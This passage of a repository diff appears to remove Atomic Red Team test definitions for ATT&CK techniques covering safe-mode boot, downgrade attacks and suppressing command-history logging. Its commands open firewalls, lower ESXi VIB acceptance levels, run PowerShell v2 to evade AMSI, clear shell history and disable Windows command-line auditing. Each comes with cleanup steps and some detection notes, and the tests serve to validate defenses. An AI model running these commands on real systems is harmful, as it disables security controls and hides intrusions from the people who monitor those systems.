| local_port | This is the local port you wish to test opening | integer | 21|
| protocol | This is the protocol | string | TCP|
| action | This is the action | string | allow|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
New-NetFirewallRule -DisplayName "New rule" -Direction "#{direction}" -LocalPort "#{local_port}" -Protocol "#{protocol}" -Action "#{action}"
```
#### Cleanup Commands
```powershell
Remove-NetFirewallRule -DisplayName "New rule"
```
### Atomic Test #25: ESXi - Set Firewall to PASS Traffic
This test sets the default ESXi firewall action to PASS instead of DROP. This allows all incoming and outgoing traffic.
**Supported Platforms:** Windows
**auto_generated_guid:** `a67e8aea-ea7c-4c3b-9b1b-8c2957c3091d`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| vm_host | Specify the host name or IP of the ESXi server. | string | atomic.local|
| vm_user | Specify the privilege user account on the ESXi server. | string | root|
| vm_pass | Specify the privileged user's password. | string | password|
| plink_file | Path to Plink | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;plink.exe|
#### Attack Commands: Run with `command_prompt`!
```cmd
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "esxcli network firewall set --default-action true"
```
#### Cleanup Commands
```cmd
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "esxcli network firewall set --default-action false"
```
#### Dependencies: Run with `powershell`!
##### Description: The plink executable must be found in the ExternalPayloads folder.
###### Check Prereq Commands
```powershell
if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
```
###### Get Prereq Commands
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
```
atomics/T1688/T1688.md
-35
View File
@@ -1,35 +0,0 @@
# T1688 - Safe Mode Boot
## Description from ATT&CK
> Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)
>
> Adversaries may abuse safe mode to disable endpoint defenses that may not start with a limited boot. Hosts can be forced into safe mode after the next reboot via modifications to Boot Configuration Data (BCD) stores, which are files that manage boot application settings.(Citation: Microsoft bcdedit 2021)
>
> Adversaries may also add their malicious applications to the list of minimal services that start in safe mode by modifying relevant Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)). Malicious [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) objects may also be registered and loaded in safe mode.(Citation: Sophos Snatch Ransomware 2019)(Citation: CyberArk Labs Safe Mode 2016)(Citation: Cybereason Nocturnus MedusaLocker 2020)(Citation: BleepingComputer REvil 2021)
[Source](https://attack.mitre.org/techniques/T1688)
## Atomic Tests
- [Atomic Test #1: Safe Mode Boot](#atomic-test-1-safe-mode-boot)
### Atomic Test #1: Safe Mode Boot
Allows adversaries to abuse safe mode to disable endpoint defenses that may not start with limited boot
**Supported Platforms:** Windows
**auto_generated_guid:** `2a78362e-b79a-4482-8e24-be397bce4d85`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
bcdedit /set safeboot network
```
#### Cleanup Commands
```cmd
bcdedit /deletevalue {current} safeboot
```
atomics/T1689/T1689.md
-143
View File
@@ -1,143 +0,0 @@
# T1689 - Downgrade Attack
## Description from ATT&CK
> Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls. Downgrade attacks typically take advantage of a systems backward compatibility to force it into less secure modes of operation.
>
> Adversaries may downgrade and use various less-secure versions of features of a system, such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s or even network protocols that can be abused to enable [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) or [Network Sniffing](https://attack.mitre.org/techniques/T1040).(Citation: Praetorian TLS Downgrade Attack 2014) For example, [PowerShell](https://attack.mitre.org/techniques/T1059/001) versions 5+ includes Script Block Logging (SBL), which can record executed script content. However, adversaries may attempt to execute a previous version of PowerShell that does not support SBL with the intent to [Impair Defenses](https://attack.mitre.org/techniques/T1562) while running malicious scripts that may have otherwise been detected.(Citation: CrowdStrike BGH Ransomware 2021)(Citation: Mandiant BYOL 2018)(Citation: att_def_ps_logging)
>
> Adversaries may similarly target network traffic to downgrade from an encrypted HTTPS connection to an unsecured HTTP connection that exposes network data in clear text.(Citation: Targeted SSL Stripping Attacks Are Real)(Citation: Crowdstrike Downgrade) On Windows systems, adversaries may downgrade the boot manager to a vulnerable version that bypasses Secure Boot, granting the ability to disable various operating system security mechanisms.(Citation: SafeBreach)
[Source](https://attack.mitre.org/techniques/T1689)
## Atomic Tests
- [Atomic Test #1: ESXi - Change VIB acceptance level to CommunitySupported via PowerCLI](#atomic-test-1-esxi---change-vib-acceptance-level-to-communitysupported-via-powercli)
- [Atomic Test #2: ESXi - Change VIB acceptance level to CommunitySupported via ESXCLI](#atomic-test-2-esxi---change-vib-acceptance-level-to-communitysupported-via-esxcli)
- [Atomic Test #3: PowerShell Version 2 Downgrade](#atomic-test-3-powershell-version-2-downgrade)
### Atomic Test #1: ESXi - Change VIB acceptance level to CommunitySupported via PowerCLI
An adversary can change the VIB acceptance level to CommunitySupported to downgrade the acceptance criteria.This can be accomplished via PowerCLI. Afterwards an adversary may proceed to installing malicious VIBs on the host.
[Reference](https://www.mandiant.com/resources/blog/esxi-hypervisors-detection-hardening)
**Supported Platforms:** Linux
**auto_generated_guid:** `062f92c9-28b1-4391-a5f8-9d8ca6852091`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| vm_host | Specify the host name of the ESXi Server | string | atomic.local|
| vm_user | Specify the privilege user account on ESXi Server | string | root|
| vm_pass | Specify the privilege user password on ESXi Server | string | pass|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
(Get-EsxCli -VMHost #{vm_host} -V2).software.acceptance.set.Invoke(@{level = "CommunitySupported"})
Disconnect-VIServer -Confirm:$false
```
#### Dependencies: Run with `powershell`!
##### Description: Check if VMWARE PowerCLI PowerShell Module is installed.
###### Check Prereq Commands
```powershell
$RequiredModule = Get-Module -Name VMware.PowerCLI -ListAvailable
if (-not $RequiredModule) {exit 1}
```
###### Get Prereq Commands
```powershell
Install-Module -Name VMware.PowerCLI -Confirm:$false
```
### Atomic Test #2: ESXi - Change VIB acceptance level to CommunitySupported via ESXCLI
An adversary will change the VIB acceptance level to CommunitySupported to downgrade the acceptance criteria via ESXCLI. Afterwards an adversary may proceed to installing malicious VIBs on the host.
[Reference](https://www.mandiant.com/resources/blog/esxi-hypervisors-detection-hardening)
**Supported Platforms:** Windows
**auto_generated_guid:** `14d55b96-b2f5-428d-8fed-49dc4d9dd616`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| vm_host | Specify the host name of the ESXi Server | string | atomic.local|
| vm_user | Specify the privilege user account on ESXi Server | string | root|
| vm_pass | Specify the privilege user password on ESXi Server | string | pass|
| plink_file | Path to plink | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;plink.exe|
| cli_script | Path to script with commands to change acceptance level | path | PathToAtomicsFolder&#92;T1689&#92;src&#92;esx_community_supported.txt|
#### Attack Commands: Run with `command_prompt`!
```cmd
echo "" | "#{plink_file}" "#{vm_host}" -ssh -l "#{vm_user}" -pw "#{vm_pass}" -m "#{cli_script}"
```
#### Dependencies: Run with `powershell`!
##### Description: Check if plink is available.
###### Check Prereq Commands
```powershell
if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
```
###### Get Prereq Commands
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
```
### Atomic Test #3: PowerShell Version 2 Downgrade
Executes outdated PowerShell Version 2 which does not support security features like AMSI. By default the atomic will attempt to execute the cmdlet Invoke-Mimikatz whether it exists or not, as this cmdlet will be blocked by AMSI when active.
**Supported Platforms:** Windows
**auto_generated_guid:** `47c96489-2f55-4774-a6df-39faff428f6f`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| v2_command | Specify the command to execute with Version 2 | string | Invoke-Mimikatz|
#### Attack Commands: Run with `powershell`!
```powershell
PowerShell -version 2 -command '#{v2_command}'
```
#### Dependencies: Run with `powershell`!
##### Description: Check if Version 2 is installed.
###### Check Prereq Commands
```powershell
$v2_installed = PowerShell -version 2 -command '$PSVersionTable.PSVersion.Major'
if (-not $v2_installed) {exit 1} else {exit 0}
```
###### Get Prereq Commands
```powershell
echo "Manually install PowerShell Version 2"
```
atomics/T1690/T1690.md
-355
View File
@@ -1,355 +0,0 @@
# T1690 - Prevent Command History Logging
## Description from ATT&CK
> Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.
>
> On Linux and macOS, command history is tracked in a file pointed to by the environment variable <code>HISTFILE</code>. When a user logs off a system, this information is flushed to a file in the user's home directory called <code>\~/.bash_history</code>. The <code>HISTCONTROL</code> environment variable keeps track of what should be saved by the <code>history</code> command and eventually into the <code>\~/.bash_history</code> file when a user logs out. <code>HISTCONTROL</code> does not exist by default on macOS, but can be set by the user and will be respected. The `HISTFILE` environment variable is also used in some ESXi systems.(Citation: Google Cloud Threat Intelligence ESXi VIBs 2022)
>
> Adversaries may clear the history environment variable (<code>unset HISTFILE</code>) or set the command history size to zero (<code>export HISTFILESIZE=0</code>) to prevent logging of commands. Additionally, <code>HISTCONTROL</code> can be configured to ignore commands that start with a space by simply setting it to "ignorespace". <code>HISTCONTROL</code> can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands.
>
> On Windows systems, the <code>PSReadLine</code> module tracks commands used in all PowerShell sessions and writes them to a file (<code>$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt</code> by default). Adversaries may change where these logs are saved using <code>Set-PSReadLineOption -HistorySavePath {File Path}</code>. This will cause <code>ConsoleHost_history.txt</code> to stop receiving logs. Additionally, it is possible to turn off logging to this file using the PowerShell command <code>Set-PSReadlineOption -HistorySaveStyle SaveNothing</code>.(Citation: Microsoft PowerShell Command History)(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)
>
> Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to disable historical command logging (e.g. <code>no logging</code>).
[Source](https://attack.mitre.org/techniques/T1690)
## Atomic Tests
- [Atomic Test #1: Disable history collection](#atomic-test-1-disable-history-collection)
- [Atomic Test #2: Disable history collection (freebsd)](#atomic-test-2-disable-history-collection-freebsd)
- [Atomic Test #3: Mac HISTCONTROL](#atomic-test-3-mac-histcontrol)
- [Atomic Test #4: Clear bash history](#atomic-test-4-clear-bash-history)
- [Atomic Test #5: Setting the HISTCONTROL environment variable](#atomic-test-5-setting-the-histcontrol-environment-variable)
- [Atomic Test #6: Setting the HISTFILESIZE environment variable](#atomic-test-6-setting-the-histfilesize-environment-variable)
- [Atomic Test #7: Setting the HISTSIZE environment variable](#atomic-test-7-setting-the-histsize-environment-variable)
- [Atomic Test #8: Setting the HISTFILE environment variable](#atomic-test-8-setting-the-histfile-environment-variable)
- [Atomic Test #9: Setting the HISTFILE environment variable (freebsd)](#atomic-test-9-setting-the-histfile-environment-variable-freebsd)
- [Atomic Test #10: Setting the HISTIGNORE environment variable](#atomic-test-10-setting-the-histignore-environment-variable)
- [Atomic Test #11: Disable Windows Command Line Auditing using reg.exe](#atomic-test-11-disable-windows-command-line-auditing-using-regexe)
- [Atomic Test #12: Disable Windows Command Line Auditing using Powershell Cmdlet](#atomic-test-12-disable-windows-command-line-auditing-using-powershell-cmdlet)
### Atomic Test #1: Disable history collection
Disables history collection in shells
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** `4eafdb45-0f79-4d66-aa86-a3e2c08791f5`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| evil_command | Command to run after shell history collection is disabled | string | whoami|
#### Attack Commands: Run with `sh`!
```sh
export HISTCONTROL=ignoreboth
#{evil_command}
```
### Atomic Test #2: Disable history collection (freebsd)
Disables history collection in shells
**Supported Platforms:** Linux
**auto_generated_guid:** `cada55b4-8251-4c60-819e-8ec1b33c9306`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| evil_command | Command to run after shell history collection is disabled | string | whoami|
#### Attack Commands: Run with `sh`!
```sh
export HISTSIZE=0
#{evil_command}
```
### Atomic Test #3: Mac HISTCONTROL
The HISTCONTROL variable is set to ignore (not write to the history file) command that are a duplicate of something already in the history
and commands that start with a space. This atomic sets this variable in the current session and also writes it to the current user's ~/.bash_profile
so that it will apply to all future settings as well.
https://www.linuxjournal.com/content/using-bash-history-more-efficiently-histcontrol
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** `468566d5-83e5-40c1-b338-511e1659628d`
#### Attack Commands: Run it with these steps!
1. export HISTCONTROL=ignoreboth
2. echo export "HISTCONTROL=ignoreboth" >> ~/.bash_profile
3. ls
4. whoami > recon.txt
### Atomic Test #4: Clear bash history
An attacker may clear the bash history cache and the history file as their last act before logging off to remove the record of their command line activities.
In this test we use the $HISTFILE variable throughout to 1. confirms the $HISTFILE variable is set 2. echo "" into it 3..5 confirm the file is empty 6 clear the history cache 7. confirm the history cache is empty. This is when the attacker would logoff.
**Supported Platforms:** Linux
**auto_generated_guid:** `878794f7-c511-4199-a950-8c28b3ed8e5b`
#### Attack Commands: Run with `bash`!
```bash
cp $HISTFILE $HISTFILE.OLD
if ((${#HISTFILE[@]})); then echo $HISTFILE; fi
echo "" > $HISTFILE
if [ $(wc -c <$HISTFILE) -gt 1 ]; then echo "$HISTFILE is larger than 1k"; fi
ls -la $HISTFILE
cat $HISTFILE
history -c
if [ $(history |wc -l) -eq 1 ]; then echo "History cache cleared"; fi
```
#### Cleanup Commands
```bash
mv -f $HISTFILE.OLD $HISTFILE
```
### Atomic Test #5: Setting the HISTCONTROL environment variable
An attacker may exploit the space before a command (e.g. " ls") or the duplicate command suppression feature in Bash history to prevent their commands from being recorded in the history file or to obscure the order of commands used.
In this test we 1. sets $HISTCONTROL to ignoreboth 2. clears the history cache 3. executes ls -la with a space in-front of it 4. confirms that ls -la is not in the history cache 5. sets $HISTCONTROL to erasedups 6. clears the history cache 7..9 executes ls -la $HISTFILE 3 times 10. confirms that their is only one command in history
**Supported Platforms:** Linux
**auto_generated_guid:** `10ab786a-028e-4465-96f6-9e83ca6c5f24`
#### Attack Commands: Run with `bash`!
```bash
TEST=$(echo $HISTCONTROL)
if [ "$HISTCONTROL" != "ignoreboth" ]; then export HISTCONTROL="ignoreboth"; fi
history -c
ls -la $HISTFILE # " ls -la $HISTFILE"
if [ $(history |wc -l) -eq 1 ]; then echo "ls -la is not in history cache"; fi
if [ "$HISTCONTROL" != "erasedups" ]; then export HISTCONTROL="erasedups"; fi
history -c
ls -la $HISTFILE
ls -la $HISTFILE
ls -la $HISTFILE
if [ $(history |wc -l) -eq 2 ]; then echo "Their is only one entry for ls -la $HISTFILE"; fi
```
#### Cleanup Commands
```bash
export HISTCONTROL=$(echo $TEST)
```
### Atomic Test #6: Setting the HISTFILESIZE environment variable
An Adversary may set the bash history files size environment variable (HISTFILESIZE) to zero to prevent the logging of commands to the history file after they log out of the system.
Note: we don't wish to log out, so we are just confirming the value of HISTFILESIZE. In this test we 1. echo HISTFILESIZE 2. set it to zero 3. confirm that HISTFILESIZE is set to zero.
**Supported Platforms:** Linux
**auto_generated_guid:** `5cafd6c1-2f43-46eb-ac47-a5301ba0a618`
#### Attack Commands: Run with `bash`!
```bash
TEST=$(echo $HISTFILESIZE)
echo $HISTFILESIZE
export HISTFILESIZE=0
echo "runnning some commands to populate the history"
whoami
groups
if [ $(echo $HISTFILESIZE) -eq 0 ]; then echo "\$HISTFILESIZE is zero"; else HIST_LENGHT=$(wc -l $HISTFILE); echo "\$HISTFILESIZE is not zero, history lenght is $HIST_LENGHT"; fi
```
#### Cleanup Commands
```bash
export HISTCONTROL=$(echo $TEST)
```
### Atomic Test #7: Setting the HISTSIZE environment variable
An Adversary may set the sh history files size environment variable (HISTSIZE) to zero to prevent the logging of commands to the history file after they log out of the system.
Note: we don't wish to log out, so we are just confirming the value of HISTSIZE. In this test we 1. echo HISTSIZE 2. set it to zero 3. confirm that HISTSIZE is set to zero.
**Supported Platforms:** Linux
**auto_generated_guid:** `386d3850-2ce7-4508-b56b-c0558922c814`
#### Attack Commands: Run with `sh`!
```sh
echo $HISTSIZE
export HISTSIZE=0
echo "runnning some commands to populate the history"
whoami
groups
if [ $(echo $HISTSIZE) -eq 0 ]; then echo "\$HISTSIZE is zero"; else HIST_LENGTH=$(wc -l $HISTFILE); echo "\$HISTSIZE is not zero, history size is $HIST_LENGTH"; fi
```
#### Cleanup Commands
```sh
export HISTSIZE=100
```
### Atomic Test #8: Setting the HISTFILE environment variable
An Adversary may clear, unset or redirect the history environment variable HISTFILE to prevent logging of commands to the history file after they log out of the system.
Note: we don't wish to log out, so we are just confirming the value of HISTFILE. In this test we 1. echo HISTFILE 2. set it to /dev/null 3. confirm that HISTFILE is set to /dev/null.
**Supported Platforms:** Linux
**auto_generated_guid:** `b3dacb6c-a9e3-44ec-bf87-38db60c5cad1`
#### Attack Commands: Run with `bash`!
```bash
TEST=$(echo $HISTFILE)
echo $HISTFILE
export HISTFILE="/dev/null"
echo "runnning some commands to populate the history"
whoami
groups
if [ $(echo $HISTFILE) == "/dev/null" ]; then echo "\$HISTFILE is /dev/null"; else HIST_LENGHT=$(wc -l $HISTFILE); echo "\$HISTFILE is not /dev/null, history lenght is $HIST_LENGHT"; fi
```
#### Cleanup Commands
```bash
export HISTFILE=$(echo $TEST)
```
### Atomic Test #9: Setting the HISTFILE environment variable (freebsd)
An Adversary may clear, unset or redirect the history environment variable HISTFILE to prevent logging of commands to the history file after they log out of the system.
Note: we don't wish to log out, so we are just confirming the value of HISTFILE. In this test we 1. echo HISTFILE 2. set it to /dev/null 3. confirm that HISTFILE is set to /dev/null.
**Supported Platforms:** Linux
**auto_generated_guid:** `f7308845-6da8-468e-99f2-4271f2f5bb67`
#### Attack Commands: Run with `sh`!
```sh
echo $HISTFILE
export HISTFILE="/dev/null"
if [ $(echo $HISTFILE) == "/dev/null" ]; then echo "\$HISTFILE is /dev/null"; fi
```
#### Cleanup Commands
```sh
export HISTFILE=~/.sh_history
```
### Atomic Test #10: Setting the HISTIGNORE environment variable
An Adversary may take advantage of the HISTIGNORE environment variable either to ignore particular commands or all commands.
In this test we 1. set HISTIGNORE to ignore ls, rm and ssh commands 2. clear this history cache 3..4 execute ls commands 5. confirm that the ls commands are not in the history cache 6. unset HISTIGNORE variable 7.. same again, but ignoring ALL commands.
**Supported Platforms:** Linux
**auto_generated_guid:** `f12acddb-7502-4ce6-a146-5b62c59592f1`
#### Attack Commands: Run with `bash`!
```bash
if ((${#HISTIGNORE[@]})); then echo "\$HISTIGNORE = $HISTIGNORE"; else export HISTIGNORE='ls*:rm*:ssh*'; echo "\$HISTIGNORE = $HISTIGNORE"; fi
history -c
ls -la $HISTFILE
ls -la ~/.bash_logout
if [ $(history |wc -l) -eq 1 ]; then echo "ls commands are not in history"; fi
unset HISTIGNORE
if ((${#HISTIGNORE[@]})); then echo "\$HISTIGNORE = $HISTIGNORE"; else export HISTIGNORE='*'; echo "\$HISTIGNORE = $HISTIGNORE"; fi
history -c
whoami
groups
if [ $(history |wc -l) -eq 0 ]; then echo "History cache is empty"; fi
```
#### Cleanup Commands
```bash
unset HISTIGNORE
```
### Atomic Test #11: Disable Windows Command Line Auditing using reg.exe
In Windows operating systems, command line auditing is controlled through the following registry value:
Registry Path: HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
Registry Value: ProcessCreationIncludeCmdLine_Enabled
When command line auditing is enabled, the system records detailed information about command execution, including the command executed, the user account responsible for executing the command, and the timestamp of the execution.
This information is crucial for security monitoring and forensic analysis, as it helps organizations detect and investigate unauthorized or malicious activities within their systems.
By default, command line auditing may not be enabled in Windows systems, and administrators must manually configure the appropriate registry settings to activate it.
Conversely, attackers may attempt to tamper with these registry keys to disable command line auditing, as part of their efforts to evade detection and cover their tracks while perpetrating malicious activities.
Because this attack executes reg.exe using a command prompt, this attack can be detected by monitoring both:
Process Creation events for reg.exe (Windows Event ID 4688, Sysmon Event ID 1)
Registry events (Windows Event ID 4657, Sysmon Event ID 13)
Read more here:
https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-220703123711.html
**Supported Platforms:** Windows
**auto_generated_guid:** `1329d5ab-e10e-4e5e-93d1-4d907eb656e5`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 0 /f
```
#### Cleanup Commands
```cmd
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 1 /f
```
### Atomic Test #12: Disable Windows Command Line Auditing using Powershell Cmdlet
In Windows operating systems, command line auditing is controlled through the following registry value:
Registry Path: HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
Registry Value: ProcessCreationIncludeCmdLine_Enabled
When command line auditing is enabled, the system records detailed information about command execution, including the command executed, the user account responsible for executing the command, and the timestamp of the execution.
This information is crucial for security monitoring and forensic analysis, as it helps organizations detect and investigate unauthorized or malicious activities within their systems.
By default, command line auditing may not be enabled in Windows systems, and administrators must manually configure the appropriate registry settings to activate it.
Conversely, attackers may attempt to tamper with these registry keys to disable command line auditing, as part of their efforts to evade detection and cover their tracks while perpetrating malicious activities.
Because this attack runs a Powershell cmdlet, this attack can be detected by monitoring both:
Powershell Logging (Windows Powershell Event ID 400, 800, 4103, 4104)
Registry events (Windows Event ID 4657, Sysmon Event ID 13)
Read more here:
https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-220703123711.html
https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/new-itemproperty?view=powershell-7.4#example-2-add-a-registry-entry-to-a-key
**Supported Platforms:** Windows
**auto_generated_guid:** `95f5c72f-6dfe-45f3-a8c1-d8faa07176fa`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
New-ItemProperty -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit" -Name "ProcessCreationIncludeCmdLine_Enabled" -Value 0 -PropertyType DWORD -Force -ErrorAction Ignore
```
#### Cleanup Commands
```powershell
New-ItemProperty -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit" -Name "ProcessCreationIncludeCmdLine_Enabled" -Value 1 -PropertyType DWORD -Force -ErrorAction Ignore
```